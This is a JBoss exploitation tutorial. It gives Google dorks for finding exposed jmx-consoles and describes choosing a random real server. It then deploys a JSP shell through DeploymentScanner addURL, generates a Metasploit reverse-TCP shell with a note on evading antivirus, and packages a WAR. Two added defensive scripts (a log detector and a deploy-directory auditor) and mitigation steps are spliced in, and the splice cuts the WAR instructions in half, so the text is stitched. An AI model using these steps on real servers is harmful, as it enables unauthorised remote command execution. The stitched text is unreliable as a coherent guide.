JBOSS Exploitation
JBoss Application Server is an open-source, Java EE-based application server. It is widely used and is deployed by many organizations on their web servers. Various vulnerabilities and bugs have been found in JBoss, but today we will look at one of the most critical bugs in the JBoss application, one that is widely exploited.
If JBoss is not configured properly, it allows attackers to perform various malicious activities. Because the JMX console is usually reachable remotely on port 8080, hackers and malicious users can deploy their own WAR (web archive) file or shell on the server using the DeploymentScanner function in the JBoss console.
There are a few Google dorks for finding the jmx-console; some of them are:
- intitle:"jboss management console" "application server" version inurl:"web-console"
- intitle:"JBoss Management Console – Server Information" "application server" inurl:"web-console" OR inurl:"jmx-console"
- inurl:jmx-console/HtmlAdaptor
Since most JBoss servers run with the default authentication configuration for the jmx-console, there is no restriction on accessing the console and web management interfaces, which allows attackers to bypass authentication and gain administrative access.
After searching for jmx-console in Google using one of the dorks, we choose a random URL and can access the jmx-console. At the same time, there are a few servers which do ask for authentication, like the one in the image shown below.
Next, we need a JSP shell, which again can be found on the internet.
To deploy the malicious file, we use the DeploymentScanner in the jmx-console. Its addURL() operation adds a new URL pointing at an application or shell, and the scanner then fetches the application from the specified URL.
The next step is to wait for the DeploymentScanner to deploy the file; then we will be able to access our shell. Before deploying the shell, we need to upload it to a site, for example http://www.malicious website.com/files/cmd.jsp. Next we deploy it by accessing the DeploymentScanner in the console. Once the URL is added, we invoke the function.
In the above image, there is a button to invoke the function. Once finished, the application displays a message reporting a successful operation. When using JSP shells, it is better to use the Metasploit JSP shells, since they are more stable than others. To create a JSP shell using Metasploit, use the command:
root@bt:~# msfpayload java/jsp_shell_reverse_tcp LHOST=192.168.1.1 LPORT=8080 R > infosec.jsp
This generates a JSP shell which can be further modified in order to evade anti-virus. Once the shell is uploaded to the server, start the Metasploit multi/handler from an msfconsole. Access the uploaded shell and you will see a new session in the msfconsole.
If you plan to upload JSP shells directly from the console, you may sometimes have to package the malicious JSP file into a WAR file. The following instructions should be used when doing this:
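The DeploymentScanner flow described above leaves a distinctive trail in the HTTP access log, which is what a defender should look for. The following Python script is an added example (it is not from the original article and not part of JBoss): it parses a few constructed Combined Log Format lines and flags every request to the jmx-console or web-console, raising a high-severity finding for an invokeOp on the DeploymentScanner MBean whose argument is a remote URL. The log lines, IP addresses and parameter names (methodName, arg0) are constructed for the example. Note that a real HtmlAdaptor invocation usually sends its parameters in a POST body, which a standard access log does not record, so without request-body logging the plain console-access rule is the one that fires reliably.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (Combined Log Format); not taken from any real server.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2012:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Mar/2012:10:02:17 +0000] "GET /jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment:type=DeploymentScanner,flavor=URL HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Mar/2012:10:02:45 +0000] "POST /jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.deployment:type=DeploymentScanner,flavor=URL&methodIndex=3&arg0=http://203.0.113.7/files/cmd.war HTTP/1.1" 200 1337 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Mar/2012:10:03:30 +0000] "GET /cmd/cmd.jsp?cmd=id HTTP/1.1" 200 245 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Mar/2012:10:03:31 +0000] "GET /web-console/ServerInfo.jsp HTTP/1.1" 401 0 "-" "Mozilla/5.0"
"""

# Client IP, timestamp, request method, request target and status code of one log line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
CONSOLE_PREFIXES = ("/jmx-console", "/web-console")
REMOTE_URL_RE = re.compile(r"^(https?|ftp|file)://", re.I)


def parse_line(line):
    """Split one access-log line into its fields; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # parse_qs splits on the first '=' only, so an MBean name such as
    # jboss.deployment:type=DeploymentScanner,flavor=URL survives intact.
    rec["query"] = {k: v[0] for k, v in parse_qs(parts.query).items()}
    return rec


def classify(rec):
    """Return (severity, reason) for a parsed record, or None if it is not of interest."""
    path, q = rec["path"], rec["query"]
    if not path.startswith(CONSOLE_PREFIXES):
        return None
    name, action = q.get("name", ""), q.get("action", "")
    if "DeploymentScanner" in name and action.startswith("invokeOp"):
        urls = [v for k, v in q.items() if k.startswith("arg") and REMOTE_URL_RE.match(v)]
        if q.get("methodName") == "addURL" or urls:
            return ("high", "DeploymentScanner addURL with remote URL(s): " + ", ".join(urls))
        return ("high", "operation invoked on DeploymentScanner MBean")
    if rec["status"] == 200:
        return ("medium", "management console served without authentication (HTTP 200)")
    return ("low", "management console request answered with HTTP %d" % rec["status"])


def scan(log_text):
    """Run the rules over every line of a log and collect the findings in order."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        hit = classify(rec)
        if hit:
            findings.append({"ip": rec["ip"], "ts": rec["ts"], "path": rec["path"],
                             "severity": hit[0], "reason": hit[1]})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print("[%s] %s %s %s: %s" % (f["severity"], f["ts"], f["ip"], f["path"], f["reason"]))
```

Run against the constructed log, the script reports the reconnaissance of the scanner MBean as medium, the addURL invocation pointing at 203.0.113.7 as high, and the rejected web-console request as low. The subsequent request to /cmd/cmd.jsp is not flagged on its own; correlating a high finding with later requests from the same source to a context root that did not exist before is the natural next step.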
- Install the most recent Java SDK (this may require a reboot).
- Copy cmd.jsp to the working directory and create a sub-directory named WEB-INF.
- Place the content below into the file WEB-INF/web.xml:

<?xml version="1.0" ?>
<web-app xmlns="http://java.sun.com/xml/ns/j2ee"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd"
         version="2.4">
  <servlet>
    <servlet-name>Command</servlet-name>
    <jsp-file>/cmd.jsp</jsp-file>
  </servlet>
</web-app>

- In Windows, pack the files into a WAR with the following command:

"C:\Program Files (x86)\Java\jdk1.6.0_26\bin\jar.exe" cvf cmd.war WEB-INF cmd.jsp

- You can also use this exploit by Kingcope to achieve the same result.
Mitigation:
- Upgrade to the latest version of JBoss.
- Disable the JBoss JMX console and web-console by removing the two .war directories, jmx-console.war and web-console.war, from $JBOSS_HOME/[server]/all/deploy and $JBOSS_HOME/[server]/default/deploy.
- Also secure the Apache Tomcat manager.
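To verify the second mitigation across every server configuration rather than just the two named, the following Python script is an added example (not part of the article and not JBoss's own tooling). It walks server/<config>/deploy under a JBOSS_HOME (the article writes the path as $JBOSS_HOME/[server]/...; the layout assumed here is the server/<config>/deploy tree of JBoss AS 4 and 5) and reports any jmx-console.war or web-console.war directory still present, plus any WAR not on a caller-supplied allow-list, since a shell pulled in through the DeploymentScanner lands in the same directory. The tree it scans is constructed in a temporary directory so the script runs offline; the known_wars allow-list and the sample WAR names (myapp.war, cmd.war) are assumptions made for the example.

```python
import os
import tempfile

# Console WARs the mitigation says to remove from every deploy directory.
CONSOLE_WARS = ("jmx-console.war", "web-console.war")


def audit_deploy_dirs(jboss_home, known_wars=()):
    """Return (kind, path, message) findings for every server/<config>/deploy under jboss_home."""
    findings = []
    server_root = os.path.join(jboss_home, "server")
    if not os.path.isdir(server_root):
        return [("error", server_root, "no server/ directory under JBOSS_HOME")]
    for config in sorted(os.listdir(server_root)):
        deploy = os.path.join(server_root, config, "deploy")
        if not os.path.isdir(deploy):
            continue
        for entry in sorted(os.listdir(deploy)):
            full = os.path.join(deploy, entry)
            if entry in CONSOLE_WARS:
                findings.append(("console-exposed", full,
                                 "management console still deployed; remove this directory"))
            elif entry.endswith(".war") and entry not in known_wars:
                # Anything not on the allow-list deserves a look: a WAR fetched by the
                # DeploymentScanner from a remote URL is deployed here like any other.
                findings.append(("unexpected-war", full,
                                 "WAR not on the allow-list; verify where it came from"))
    return findings


def build_demo_tree():
    """Construct a throwaway JBOSS_HOME layout for the demo (constructed, not a real install)."""
    root = tempfile.mkdtemp(prefix="jboss-demo-")
    layout = {
        "default": ["jmx-console.war", "web-console.war", "myapp.war", "cmd.war"],
        "all": ["myapp.war"],
    }
    for config, wars in layout.items():
        deploy = os.path.join(root, "server", config, "deploy")
        os.makedirs(deploy)
        for war in wars:
            os.makedirs(os.path.join(deploy, war))  # exploded WARs are directories
    return root


if __name__ == "__main__":
    home = os.environ.get("JBOSS_HOME") or build_demo_tree()
    for kind, path, message in audit_deploy_dirs(home, known_wars={"myapp.war"}):
        print("[%s] %s: %s" % (kind, path, message))
```

With JBOSS_HOME set, the script audits a real installation; without it, the constructed tree yields one unexpected-war finding for cmd.war and two console-exposed findings for the default configuration, while the all configuration, which only holds the allow-listed myapp.war, produces nothing.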
Reference:
https://www.trustwave.com/downloads/spiderlabs/Trustwave-SpiderLabs-Abusing-Jboss-Papathanasiou.pdf